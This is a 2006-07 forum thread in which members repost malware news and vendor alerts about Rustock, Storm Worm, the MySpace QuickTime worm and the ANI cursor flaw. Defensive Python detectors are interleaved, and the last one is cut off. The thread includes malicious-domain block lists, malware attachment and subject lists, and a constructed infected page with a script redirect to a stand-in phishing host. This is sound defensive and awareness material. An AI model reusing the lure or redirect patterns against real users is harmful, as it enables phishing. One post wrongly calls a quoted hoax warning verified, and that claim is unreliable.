claims to be from Worldpay. Often the sender is listed as
Dave Gollick and it usually refers to a chargeback against
your credit card.

It's a hoax of course - so if you receive it don't respond, don't
open any attachment - ideally just delete it without opening or
reading it.


 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Yet again, another threat to our PC Security - a new breed of Rootkits
that can elude detection. Man, these cyber terrorists are getting
creative. Read here,

Quote
Rootkits get better at hiding
By Joris Evers, CNET News.com
Published on ZDNet News: July 18, 2006, 6:35 PM PT

A new Trojan horse is so good at hiding itself that some security researchers claim a new chapter has begun in their battle against malicious-code authors.

The new pest, dubbed "Rustock" by Symantec and "Mailbot.AZ" by F-Secure, uses "rootkit" techniques crafted to avoid the detection technology used by security software, Symantec and F-Secure said in recent analyses.

"It can be considered the first born of the next generation of rootkits," Elia Florio, a security response engineer at Symantec, wrote in a blog late last month. "Rustock.A consists of a mix of old techniques and new ideas that when combined make a malware that is stealthy enough to remain undetected by many rootkit detectors commonly used."

Rootkits are considered an emerging threat. They are used to make system changes to hide software, which may be malicious. In the case of Rustock or Mailbot.AZ, rootkit technology was used to hide a Trojan horse that opens a backdoor on an infected system, putting it at the beck and call of an attacker, according to Symantec.

In their continuing race with security software makers, the creators of this latest rootkit appear to have looked closely at the inner workings of detection tools before crafting their malicious code, said Craig Schmugar, virus research manager at McAfee, which calls the pest "PWS-JM."

"Security companies are trying to stay one step ahead of the bad guys, but the bad guys already have the technology that is available from the security vendors," he said. "A number of techniques have been combined to really strengthen and harden this particular threat. They have done a pretty good job at closing all the doors."

The mixture of cloaking methods makes Rustock "totally invisible on a compromised computer when installed," including on a PC running an early release of Windows Vista, Symantec's Florio wrote. "We consider it to be an advanced example of stealth by design malicious code."

To avoid detection, Rustock runs no system processes, but runs its code inside a driver and kernel threads, Florio wrote. It also uses alternate data streams instead of hidden files and avoids using application programming interfaces (APIs). Today's detection tools look for system processes, hidden files and hooks into APIs, according to Florio's post.

Additionally, Rustock defeats rootkit detectors' checks for the integrity of some kernel structures and the detectors' efforts to detect hidden drivers, Florio wrote. Furthermore the SYS driver the rootkit uses is polymorphic and changes its code from sample to sample, according to the blog posting.

Still, chances of people being attacked by this rootkit and its malicious Trojan horse payload are slim, experts said. "People are blogging about it not because it is highly prevalent, but because of the challenges it poses to existing rootkit detection tools," Schmugar said. Symantec and F-Secure also both state the threat is not widespread.

F-Secure updated its BlackLight rootkit detection tool that can detect current versions of the pest, the company said in a blog. Symantec and McAfee are still working on tools to detect and remove rootkits from computers.

http://news.zdnet.com/2100-1009_22-6095762.html?tag=nl.e550

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Just another thing to worry about,

Quote
Patch Tuesday--let the attacks begin

Commentary--Somewhere--perhaps in the United States, but more likely, somewhere in China--a man walks out of a nondescript building, casts his eyes upon the urban landscape around him after spending an eight-hour day staring at a computer screen, and lights a cigarette.

He does not know his bosses by name or by face; he knows only that he is paid, and paid pretty well, for his research. Like a legitimate computer-security researcher, he uses automated testing tools against Microsoft Office software, probing for buffer overflows, pointer errors or negative integers in Word, Excel and PowerPoint. Unlike a legitimate security professional, he does not report what he finds to Microsoft.

Instead, either he or his bosses will use this information for corporate espionage, to create what's called a zero-day attack, using targeted Trojan horses that exploit an unpublished flaw. Worse, they'll wait until after Microsoft publishes its latest patches on the second Tuesday of the month. They'll release their attacks the day after, when everyone's distracted by the new patches--a day we'll call "Zero-day Wednesday."

Patch Tuesday under attack
Just a few years ago, Microsoft would, out of the blue, announce a handful of patches, some critical, some not. The problem is--well, there are many problems.

First, Microsoft found it hard to inform everyone of the critical nature of the more serious vulnerabilities, especially if the announcement went out on Friday afternoon at 3 p.m. Worse, say someone did notice and hurriedly applied the patch, only to find on Saturday morning that it broke some functionality somewhere else in the system. Who would pay the overtime?

So--for the last two years, with only minor exceptions--Microsoft has announced its patches on the second Tuesday of each month. System administrators plan on it, and the general public has come to expect it. On rare occasions, Microsoft has reissued a patch or two.

But software vulnerabilities don't follow timetables. In May, the day after Microsoft released three updates, someone released a Trojan horse based on a previously unknown flaw (also known as a "zero-day" flaw) in Microsoft Word; Microsoft patched this in MS06-027. In June, after Microsoft patched 21 individual vulnerabilities, there was a zero-day attack on Excel files; Microsoft patched this in MS06-037.

And now, in July, after Microsoft patched 18 flaws, someone has released a zero-day attack on PowerPoint files. Microsoft says it'll patch this flaw on the next Patch Tuesday. However, within the last few days, we've seen at least three distinct backdoor Trojans using the PowerPoint flaws, with more Trojans possible before Aug. 8 this year.

Spear-phishing
Should home users worry? Not yet. These PowerPoint Trojans are not broadcast scattershot across the Internet like the large-scale virus attacks we've all grown to expect during the summer. Instead, these Trojans are targeted so that the victim companies won't realize they've been hit until after the fact. The bad guys are taking advantage of the common practice of sending and receiving Office files, making their poisoned e-mail look like legitimate interoffice traffic.

To do so, the bad guys have to be sophisticated; they have to be organized. One uses Google to research target companies, perhaps identifying legitimate e-mail groups within a target. Using a process known as spear-phishing, a criminal hacker can fashion an internal e-mail with subject lines like "Here are the Q1 sales figures," and the e-mail might be sent to "sales team alpha" from "sales internal." Someone receiving that e-mail wouldn't necessarily suspect the Excel to be poisoned.

Meanwhile, another individual bad guy (or a group of others) looks for unreported vulnerabilities. Not every vulnerability that's found can be exploited, and not every exploit lends itself to the type of crime that's profitable. Yet another person crafts a Trojan horse. And so on. The current crop of PowerPoint Trojans have been broadcasting captured keystrokes and other data to addresses within the 8800.org domain, a Chinese Web hosting site, but that could easily be a dead end.

So is the solution not to open any e-mail attachments? Have the villains finally won? No. Remember, the criminal hackers have been sending these to targeted companies, so, unlike the situation with the Melissa virus, interoffice Word documents, in general, ought to be safe. Antivirus vendors, with their vast networks of reporting desktops worldwide, are the ones discovering these corporate-espionage Trojans. As long as your antivirus protection is up-to-date, you should get protection within a few hours or days of a new zero-day threat. As for the companies under attack, they need to be wary of attachments and wait for Microsoft to patch these latest PowerPoint flaws.

http://news.zdnet.com/2100-1009_22-6098229.html?tag=nl.e589

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Just an alert for Firefox users.

It seems the scum who produce scumware are turning their attention
towards Firefox. Since it's gaining popularity, and many are migrating
here from Internet Explorer, FF is gaining visibility.

Here check it out,

Quote
Trojan piggybacks on Firefox

A new Trojan horse making the rounds has been installing itself as a Firefox extension, according to security company McAfee.

The FormSpy Trojan attacks computers that have already been infected with the Downloader-AXM Trojan, according to a security advisory McAfee issued Tuesday. Once FormSpy is executed, it installs itself as a component of the Firefox Web browser.

The FormSpy spyware then gleans sensitive information, such as credit card and bank account numbers, from the user's browser and forwards it to a malicious Web site. But this Trojan is capable of other tricks, as well, McAfee noted.

The main executable is also capable of sniffing passwords from traffic for ICQ (the "I seek you" program that alerts users to the presence of acquaintances online), FTP (file transfer protocol), IMAP (Internet message access protocol, an e-mail management program) and POP3 (post office protocol, a data format for e-mail), McAfee warned.

Although the FormSpy Trojan is circulating, it is considered a low risk, McAfee said. What's more, people may have already taken steps to mitigate the earlier Downloader-AXM Trojan that is needed for the FormSpy Trojan to take hold.

http://news.zdnet.com/2100-1009_22-6098615.html?tag=nl.e589

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Users of MySpace,

There's a worm that's running rampant within the MySpace environment! Make sure your antivirus/antispyware/firewall programs are up-to-date.

Here's an article I received in my Inbox.

Quote
MySpace QuickTime Worm

It seems that on December 1st, a cross-scripting worm was
discovered to be infecting MySpace accounts. The
JS/Qspace, as it has been called, is a worm that uses
vulnerability in Apple’s QuickTime Media Player HREF feature
in order to redirect visitors to a phishing site. Once on the
site, the users are asked to put in their information where it is
then gathered.

The vulnerability is a two-part attack. First, it uses the aforementioned
vulnerability in QuickTime in order to take
advantage of the vulnerability in MySpace, which can allow
the automatic modification of an account, even from a Web
site. This modified account then becomes a trap for other
unsuspecting users, by creating an appealing page, complete
with a .mov file to view.

The QuickTime vulnerability uses the HREF feature in
QuickTime, which allows links to be put into movie files that
can link out to ftp/http/https sites and even run JavaScript.
An infected MySpace user account has been modified with
an embedded QuickTime movie and a modification of all the
links on the page to redirect visitors to the phishing page. If a
user wishes to view the movie, they are redirected to a
bogus login page where they are prompted to enter their
username and password at which time, the information
is collected. This information is then used to log in and modify
that account and so on and so forth.

The MySpace part of this attack comes in the form of being
able to modify MySpace accounts from an outside location
and being able to modify accounts in bulk, without any sort of
system security intervention. This allows the second half of
the infection, which is the assimilation of the infected user's
account, to ensnare other members. Some of the
modifications include the embedded QuickTime movie and
the modification of all the links on the page. The page itself
gets a new look with a blue navigation bar, among other
things, that are not usually present on a MySpace user
account page.

The infected user will also attempt to gather up some
business by spamming all the users in the infected user's
contact list. The spam appears to have an attached movie,
but it actually redirects you to a porn site where a company
called Zango, Inc. takes over. Zango, Inc. is formerly known
as 180 Solutions, which is a company that coincidentally
settled for three million dollar deal with the Federal Trade
Commission a month ago in an AdAware case, in which they
were accused of adding software without proper user
consent.

There are over 73 million registered users on MySpace and in
an unofficial security scan of 150 MySpace users, it was
revealed that one third of all the users were infected. That
could potentially be some huge numbers. MySpace has
reported, however, that they have already shut down all of
the infected accounts, so everyone should be safe now.

This isn’t the first time there has been an attack on the
MySpace Web service and in fact, there were a couple of
variations of this worm floating around the site as well. On
top of taking advantage of the unpatched vulnerabilities, the
reason this particular virus was so successful is because
of the fact that people think movies are always safe. Well,
they obviously aren't, so keep that in mind. Also, the fact that
with MySpace, the account seems to timeout quite often,
prompting the users to log in from time to time, makes things
questionable. This makes the QuickTime movie file login
seem like it belongs, so unsuspicious users would log right in,
coughing up their information to the attackers.

In short, watch what you’re clicking on in MySpace. This
holds especially true with any QuickTime .mov files and any
suspicious messages from your contacts, complete with
links. If MySpace asks for your account login information, be
suspicious and recheck the actual address.

Until next week, stay safe out there

*********************************

Steve, Publisher
Computer Tips and Techniques


:cool:
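The newsletter above names two things a compromised profile page shows: an embedded QuickTime movie whose plug-in parameters send the visitor elsewhere (or run script), and the page's own links rewritten to point at the phishing host. The scan below is an added example, not code from the newsletter, from MySpace or from Apple; it reads a saved copy of a profile page and reports both indicators. The 80% rewritten-link threshold, the use of the QuickTime plug-in's `href` and `qtnext` parameters as the place to look, and both sample pages are assumptions constructed for the demo.

```python
"""Indicator scan for the MySpace/QuickTime worm described in the newsletter above.

Added example, not code from the newsletter or from MySpace. The 80% link
threshold and the sample HTML are assumptions constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "myspace.com"


def same_site(host, site=SITE_HOST):
    return host == site or host.endswith("." + site)


def host_of(url):
    # Relative links have no host and count as on-site.
    return (urlparse(url).hostname or "").lower()


class ProfileScanner(HTMLParser):
    """Collects hyperlinks and QuickTime embeds from one page."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.quicktime = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        if tag in ("embed", "object"):
            src = a.get("src") or a.get("data") or ""
            if a.get("type", "").lower() == "video/quicktime" or src.lower().endswith(".mov"):
                # href/qtnext are QuickTime plug-in parameters that can carry a URL or javascript:
                self.quicktime.append({"src": src, "href": a.get("href"), "qtnext": a.get("qtnext")})


def scan_profile(html, site=SITE_HOST, rewrite_threshold=0.8):
    """Return a list of findings; an empty list means neither indicator was seen."""
    scanner = ProfileScanner()
    scanner.feed(html)
    findings = []

    # Indicator 1: the page's navigation links have been rewritten to an outside host.
    external = [u for u in scanner.links if host_of(u) and not same_site(host_of(u), site)]
    if scanner.links and len(external) / len(scanner.links) >= rewrite_threshold:
        hosts = sorted({host_of(u) for u in external})
        findings.append(f"{len(external)}/{len(scanner.links)} links point off-site: {hosts}")

    # Indicator 2: an embedded QuickTime movie that redirects or runs script.
    for qt in scanner.quicktime:
        for param in ("href", "qtnext"):
            value = qt[param]
            if not value:
                continue
            if value.lower().startswith("javascript:"):
                findings.append(f"QuickTime embed {qt['src']!r} runs script via {param}")
            elif not same_site(host_of(value), site):
                findings.append(f"QuickTime embed {qt['src']!r} sends {param} to {host_of(value)}")
    return findings


# Constructed sample pages (not captured from MySpace).
INFECTED_PAGE = """
<div class="nav" style="background:blue">
  <a href="http://login.example-phish.invalid/home">Home</a>
  <a href="http://login.example-phish.invalid/browse">Browse</a>
  <a href="http://login.example-phish.invalid/search">Search</a>
  <a href="http://login.example-phish.invalid/mail">Mail</a>
  <a href="/profile/12345">Me</a>
</div>
<embed src="http://cdn.example-phish.invalid/clip.mov" type="video/quicktime"
       href="javascript:location.href='http://login.example-phish.invalid/'" autoplay="true">
"""

CLEAN_PAGE = """
<a href="http://www.myspace.com/home">Home</a>
<a href="http://browse.myspace.com/">Browse</a>
<a href="/profile/12345">Me</a>
<embed src="http://myspace.com/clip.mov" type="video/quicktime">
"""

if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_profile(page) or "no indicators")
```

The link ratio matters more than any single link: a profile legitimately links off-site now and then, but a navigation bar where nearly every entry leaves the site is the "all the links on the page" rewrite the newsletter describes.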


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Virus Update: Panda warns of a dangerous Virus doing the rounds online

Quote
- Panda Software's weekly report on viruses and intruders -
    Virus Alerts, by Panda Software (http://www.pandasoftware.com)

Madrid, December 8, 2006 - This week's report looks at the FormShared.A
worm and the Banker.FOH and Banbra.DMW Trojans.

FormShared.A is a worm aimed at spreading the SpyForms.S Trojan across
P2P file-sharing programs.

To do this, FormShared.A uses its own P2P client. It creates a
subfolder called SHARED in the Windows directory. This contains a series of
files with false names in order to entice other users to download
SpyForms.S voluntarily. These names include: 4SCREENS V3.19 BY MP2K.CZIP, 4T AV
V1.8 CD-VERSION FOR PALMOS.CZIP, 4T PUBLICATION 1.2 FOR PALMOS.CZIP, or
4TEAM FOR MICROSOFT OUTLOOK 2002 V1.50.0202 RETAIL.CZIP.

Banker.FOH is a Trojan designed to steal confidential information, such
as user names and passwords, from compromised computers. It does this
by capturing keystrokes entered by the user, storing them and then
sending them out by email.

If Banker.FOH runs on a computer without an Internet connection, an
error screen is displayed with the text: Socket Error # 11004.

As with most Trojans, Banker.FOH is not able to spread by itself, and
therefore needs the intervention of a malicious user. The means of
distribution used vary and include floppy disks, CD-ROMs, email messages
with attachments, Internet download, files transferred via FTP, IRC
channels, P2P file sharing networks, etc.
 
Finally, Banbra.DMW is a Trojan designed to steal confidential data
from users of a well-known Brazilian bank. Interestingly, this is a
'one-use' malicious code which can only be run once on each computer it
infects.

Every time it infects a computer, Banbra.DMW sends an email to the
creator of the Trojan indicating the username and the time the computer was
infected. Once it has done this, it hijacks Internet Explorer and waits
for the user to access the bank's web page. Then, Banbra.DMW takes the
user to a false web page -created by the Trojan itself- which is an
imitation of the original page.

Finally, it compiles the stolen data and sends it out by email,
allowing the attacker to commit identity theft and online fraud.

All users that want to know whether their computers have been attacked
by these or other malicious code can use ActiveScan, the free solution
available at: www.pandasoftware.com/activescan. Users can carry out a
complete inspection, free of charge, of all the areas of their computers
that they suspect may be infected.

For further information about these and other computer threats, visit
Panda Software's Encyclopedia.

------------------------------------------------------------
To unsubscribe from Virus Alerts, please visit:
http://www.pandasoftware.com/unsubscribe.asp

To contact with Panda Software, please visit:
http://www.pandasoftware.com/about/contact/
--------------------------


Just make sure your antivirus systems are in place and updated!

:cool:


part_timer_lang

  • Moderator
  • *
    • Posts: 1,231
    • Likes Received: +1/-0
It seems the target again here is Internet Explorer so be sure to use a different browser. And always keep your computers secure from viruses and spywares.  


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Especially this Christmas time. These cybercrooks are especially aware that people are looking to buy online. So just be careful and make sure your protection software is intact!

:cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Guys, careful about this worm. It behaves nicely but don't be deceived. Here, read this,

Quote
This worm wishes you a Happy New Year

An e-mail worm disguised as a New Year's greeting is making the rounds on the Internet.

Worm-laden messages are titled "Happy New Year" and contain an attachment called either postcard.exe or postcard.zip, according to experts at VeriSign's iDefense Labs, which provides information on security flaws and exploits. If the attachment is opened, malicious software is downloaded from the Internet and can infect computers running Windows operating systems.

Once a computer is infected, it looks for open mail proxies and begins spamming mail to infect other computers. The worm is already moving quickly across the Internet, at a rate of five e-mails per second on at least one large network, according to the iDefense Labs Web site.

Security experts say that although the virus looks similar to the Warezov Trojan horse that has plagued the Internet for the past month, it is actually a new variant of the worm and has been largely undetected as of December 28. iDefense performed a triage analysis of the threat and found that more than a dozen codes were installed on a computer from several worm and Trojan horse families. More than 160 e-mail servers are used by the worm to send out spam to potential victims, the company said.

High volumes of mass e-mails are usually sent around the holidays. This year has been no different, experts say. The spike in holiday spam is largely attributed to the fact that people have been more likely to open the messages.

Read more here ....
http://news.zdnet.com/2100-1009_22-6146321.html?tag=nl.e550

:cool:


sam_1_els

  • sam_1_else
  • Forum Master 400
  • ***
    • Posts: 459
    • Likes Received: +0/-0
Bin-Laden and Olympic Torch Virus

This virus has been circulating the net since mid 2006. Just got this warning email from a friend today, it's better to be aware. This virus has been verified by snopes.com as real.

Quote
Bin-Laden and Olympic Torch Virus Warning Hoax
Summary:
Message claims that two very destructive viruses are being distributed, one in an email concerning the capture or hanging of Osama Bin-Laden and another in an email with the subject "Invitation" (Full commentary below.)
 
Emails with pictures of Osama Bin-Laden hanged are being sent and the moment that you open these emails your computer will crash and you will not be able to fix it!

This e-mail is being distributed through countries around the globe, but mainly in the US and Israel.

Don't be inconsiderate; send this warning to whomever you know.

If you get an email along the lines of "Osama Bin Laden Captured" or "Osama Hanged" don't open the attachment.

Please read the attached warning issued today.

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS:

You should be alert during the next days:

Do not open any message with an attached file called "Invitation" regardless of who sent it.

It is a virus that opens an Olympic Torch which "burns" the whole hard disc C of your computer. This virus will be received from someone who has your e-mail address in his/her contact list, that is why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it.

If you receive a mail called "invitation", though sent by a friend, do not open it and shut down your computer immediately.

This is the worst virus announced by CNN, it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept.


more info here.... http://www.snopes.com/computer/virus/osama.asp


Wynn

  • Forum Master 400
  • ***
    • Posts: 485
    • Likes Received: +0/-0
New Virus in town,  Trojan.Peacomm.  
People, just be careful. One of my computers almost became a victim because I received an email with a very catchy subject; luckily I decided to google the news myself. I received the news in Chinese, so I looked for an English version, and this is the one I found on symantec.com.


Discovered: January 19, 2007
Updated: January 22, 2007 04:04:42 PM GMT
Also Known As: CME-711 [Common Malware Enumeration], TROJ_SMALL.EDW [Trend Micro], Small.DAM [F-Secure], Downloader-BAI [McAfee], Troj/Dorf-Fam [Sophos]
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP


Trojan.Peacomm is a Trojan horse that drops a driver program file to download additional security threats.

Trojan.Peacomm reportedly arrives as an attachment to a spammed email with the following characteristics:

Subject:
One of the following:

    * A killer at 11, he's free at 21 and kill again!
    * U.S. Secretary of State Condoleezza Rice has kicked German Chancellor Angela Merkel
    * British Muslims Genocide
    * Naked teens attack home director.
    * 230 dead as storm batters Europe.
    * Re: Your text
    * Radical Muslim drinking enemies's blood.
    * Chinese missile shot down Russian satellite
    * Chinese missile shot down Russian aircraft
    * Chinese missile shot down USA aircraft
    * Chinese missile shot down USA satellite
    * Russian missile shot down USA aircraft
    * Russian missile shot down USA satellite
    * Russian missile shot down Chinese aircraft
    * Russian missile shot down Chinese satellite
    * Saddam Hussein safe and sound!
    * Saddam Hussein alive!
    * Venezuelan leader: "Let's the War beginning".
    * Fidel Castro dead.


Attachment:
One of the following:

    * FullVideo.exe
    * Full Story.exe
    * Video.exe
    * Read More.exe
    * FullClip.exe
    * GreetingPostcard.exe
    * MoreHere.exe
    * FlashPostcard.exe
    * GreetingCard.exe
    * ClickHere.exe
    * ReadMore.exe
    * FlashPostcard.exe
    * FullNews.exe


Note: Due to a substantial increase in activity, Symantec Security Response raised this threat to category 3 on January 22, 2007.

Further reading: Trojan.Peacomm: Building a Peer-to-Peer Botnet


Protection

    * Virus Definitions (LiveUpdate Daily) January 19, 2007
    * Virus Definitions (LiveUpdate Weekly) January 22, 2007
    * Virus Definitions (Intelligent Updater) January 19, 2007
    * Virus Definitions (LiveUpdate Plus) January 19, 2007

Threat Assessment
Wild

    * Wild Level: High
    * Number of Infections: More than 1000
    * Number of Sites: More than 10
    * Geographical Distribution: Medium
    * Threat Containment: Easy
    * Removal: Moderate

Damage

    * Damage Level: High
    * Payload: Downloads additional security threats.
    * Degrades Performance: Sent UDP packets may degrade performance.

Distribution

    * Distribution Level: Low
    * Ports: UDP port 4000, UDP port 7871

Writeup By: Masaki Suenaga


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Yes, I've received a number of those, especially this December. However, they have been tapering off just recently. Anyway, I suspected that they were "scumware", so I just trashed them.

But it's good to receive confirmation and the technical details. You've done the PMT a great service. So,

Thanks Wynn!

You're a ... wynner!

:cool:

Let me just append this since I just got it from a newsletter, and it's related,

Quote
'Storm Worm' rages across the globe

"Storm Worm," one of the larger Trojan horse attacks in recent years, is baiting people with timely information about a deadly, real-life storm front, security researchers said Friday.

Over an eight-hour period Thursday, malicious e-mails were sent across the globe to hundreds of thousands of people, said Mikko Hypponen, chief research officer for F-Secure.

People who open the attachment then unknowingly become part of a botnet. A botnet serves as an army of commandeered computers, which are later used by attackers without their owners' knowledge.

Storm Worm carries the subject line "230 dead as storm batters Europe," Hypponen said, noting the unusual twist to the e-mail.

"The e-mail was started 15 hours ago, when the storm was peaking in Central Europe," Hypponen said. "This is unusual in that it was very timely."

Storm Worm is a Trojan horse with an executable file as an attachment. Cybercriminals took advantage of social engineering, using the news of the European storm to get people to open the attached malicious file, which promises more news on the weather emergency. The recipient must open the file for it to execute.

The file creates a back door to a computer that can be exploited later to steal data or to use the computer to post spam.

Storm Worm is already close to being as large as the bigger attacks of 2006, Hypponen said, though it's still smaller than Sasser and Slammer.

Hypponen also noted that this Trojan horse is unusual because most attacks these days tend to be smaller and targeted, as criminals seek to pilfer personal information for financial gain, rather than fame.

Though Storm Worm is widespread, the damage may ultimately be minimal in the U.S. because most tech security companies will have already added it to their blocking list before people get into work, he added.

Other e-mail subject lines for it include "U.S. Secretary of State Condoleezza..." and "A killer at 11, he's free at 21 and..."

According to the Associated Press, the European storm has killed at least 41 people.

http://news.zdnet.com/2100-1009_22-6151414.html?tag=nl.e550
« Last Edit: Jan 24, 2007, 11:29 AM by rma2003 »
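The Symantec writeup and the F-Secure quote above give the same two indicators for Trojan.Peacomm / "Storm Worm": a fixed set of news-style subject lines and a fixed set of executable attachment names. The mail-gateway check below is an added example, not code from Symantec, F-Secure or the forum posts. The subject lines and attachment names are copied from the Symantec writeup; the extra rule that any executable attachment is quarantined regardless of name is my own addition, since lure names rotate faster than any list. The sample messages are constructed with Python's `email` package, not captured spam.

```python
"""Mail-gateway check for the Trojan.Peacomm / "Storm Worm" lure quoted above.

Added example, not code from Symantec, F-Secure or the forum posts.
The generic executable rule and the sample messages are assumptions.
"""
import email
from email import policy
from email.message import EmailMessage

# Indicators from the Symantec writeup quoted above.
PEACOMM_SUBJECTS = {
    "A killer at 11, he's free at 21 and kill again!",
    "U.S. Secretary of State Condoleezza Rice has kicked German Chancellor Angela Merkel",
    "British Muslims Genocide",
    "Naked teens attack home director.",
    "230 dead as storm batters Europe.",
    "Re: Your text",
    "Radical Muslim drinking enemies's blood.",
    "Chinese missile shot down Russian satellite",
    "Chinese missile shot down Russian aircraft",
    "Chinese missile shot down USA aircraft",
    "Chinese missile shot down USA satellite",
    "Russian missile shot down USA aircraft",
    "Russian missile shot down USA satellite",
    "Russian missile shot down Chinese aircraft",
    "Russian missile shot down Chinese satellite",
    "Saddam Hussein safe and sound!",
    "Saddam Hussein alive!",
    'Venezuelan leader: "Let\'s the War beginning".',
    "Fidel Castro dead.",
}
PEACOMM_ATTACHMENTS = {
    "FullVideo.exe", "Full Story.exe", "Video.exe", "Read More.exe", "FullClip.exe",
    "GreetingPostcard.exe", "MoreHere.exe", "FlashPostcard.exe", "GreetingCard.exe",
    "ClickHere.exe", "ReadMore.exe", "FullNews.exe",
}
# Generic rule (assumption): executables by any name do not belong in inbound mail.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def normalize(text):
    # Tolerate the small differences between reports, e.g. a trailing period.
    return " ".join(text.split()).casefold().rstrip(".!? ")


KNOWN_SUBJECTS = {normalize(s) for s in PEACOMM_SUBJECTS}
KNOWN_ATTACHMENTS = {a.casefold() for a in PEACOMM_ATTACHMENTS}


def attachment_names(msg):
    return [part.get_filename() for part in msg.walk() if part.get_filename()]


def classify(raw):
    """Return (verdict, reasons) for one raw RFC 822 message given as bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg["Subject"] or "")
    reasons = []
    if normalize(subject) in KNOWN_SUBJECTS:
        reasons.append(f"known Peacomm subject: {subject!r}")
    for name in attachment_names(msg):
        if name.casefold() in KNOWN_ATTACHMENTS:
            reasons.append(f"known Peacomm attachment: {name}")
        elif name.casefold().endswith(EXECUTABLE_SUFFIXES):
            reasons.append(f"executable attachment: {name}")
    return ("quarantine" if reasons else "deliver"), reasons


def build_sample(subject, filename, payload=b"MZ\x90\x00"):
    """Constructed test message (not a captured spam run)."""
    m = EmailMessage()
    m["From"] = "news@example.invalid"
    m["To"] = "user@example.invalid"
    m["Subject"] = subject
    m.set_content("Full story in the attachment.")
    m.add_attachment(payload, maintype="application", subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    for subj, fn in (("230 dead as storm batters Europe", "Full Story.exe"),
                     ("Here are the Q1 sales figures", "q1.xls"),
                     ("Re: Your text", "notes.txt")):
        print(subj, "->", classify(build_sample(subj, fn)))
```

Matching on normalized subjects is deliberate: the Symantec list ends "230 dead as storm batters Europe." with a period while the ZDNet piece quotes it without one, and a filter that insists on an exact string would miss one of them.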


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Here are things you may want to be aware of, so that you could put additional safeguards to your computing experiences.

Quote
Windows animated cursor flaw--150 sites infected

 By  Robert Vamosi,  ZDNet Reviews
Published on ZDNet News: April 2, 2007, 6:30 AM PT

There's a new Microsoft Windows vulnerability being exploited across the Internet on over 150 Web sites. The vulnerability is caused by an unspecified error in the way Windows 2000, XP, and Vista handles animated cursors.

Animated cursors allow a mouse pointer to appear animated on a Web site. The feature is often designated by the .ani suffix, but attacks for this vulnerability are not constrained by this file type so simply blocking .ani files won't necessarily protect a PC. Successful exploitation can result in memory corruption when processing cursors, animated cursors, and icons. According to Arbor Networks, the malicious code on compromised Web sites exploiting this flaw appears to be originating from the following sites, which you may want to block:

wsfgfdgrtyhgfd.net

85.255.113.4

uniq-soft.com

fdghewrtewrtyrew.biz

newasp.com.cn

To become infected, users must be using Internet Explorer 6 or 7; there is no need to click, just visiting an infected site is enough for an infection. The flaw does not affect Firefox or Opera Internet Browsers. Microsoft will release a patch on April 3, 2007. Until a patch is released, users should browse the Internet using a non-Internet Explorer browser.

Additional Resources

Microsoft: Advisory 935423

NIST: CVE-2007-0038

Arbor Networks: Any Ani file could infect you

Internet Threat Rating 8: How we rate


Quick Facts

Name: Windows animated cursor attack

Date first reported: 03/29/07

CVE Number: CVE 2007-0038

Vulnerable software: Microsoft Windows 2000, SP1 through Windows Vista.

What it does: Causes a denial of service attack (persistent reboot) or could allow remote access.

Recommendations: Use an Internet browser other than Microsoft Internet Explorer, such as Firefox or Opera.

Exploit code available: Yes

Vendor patch available: Expected April 3, 2007.

http://news.zdnet.com/2100-1009_22-6172440.html?tag=nl.e550



:cool:
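The article above makes the point that the animated cursor attack is not tied to the .ani extension, so a filter that only blocks `.ani` names misses it. The checker below is an added example, not code from Microsoft, Arbor Networks or ZDNet: it ignores the file name, sniffs the RIFF/ACON signature, walks every chunk in the container, and flags any `anih` chunk whose declared size is not the 36 bytes of the ANIHEADER structure. The hostile sample (a valid first `anih` chunk followed by an oversized second one) is constructed here to match the shape described in public analyses of CVE-2007-0038; it is not an exploit file, and the benign sample and the choice of what to flag are assumptions for the demo.

```python
"""Content-based check for Windows animated cursor (.ani) files.

Added example for the CVE-2007-0038 / advisory 935423 item above; not
Microsoft's or Arbor's code. Samples are constructed, not real cursors.
"""
import struct

# sizeof(ANIHEADER): cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
ANIHEADER_SIZE = 36


def is_ani(data):
    """Signature check: RIFF container with form type ACON, whatever the file is called."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"ACON"


def riff_chunks(data, offset, end):
    """Yield (fourcc, declared_size, payload) for each chunk, descending into LIST chunks."""
    while offset + 8 <= end:
        fourcc, size = struct.unpack_from("<4sI", data, offset)
        start = offset + 8
        stop = start + size
        if stop > end:
            # Declared size runs past the container: report what is there and stop.
            yield fourcc, size, data[start:end]
            return
        if fourcc == b"LIST":
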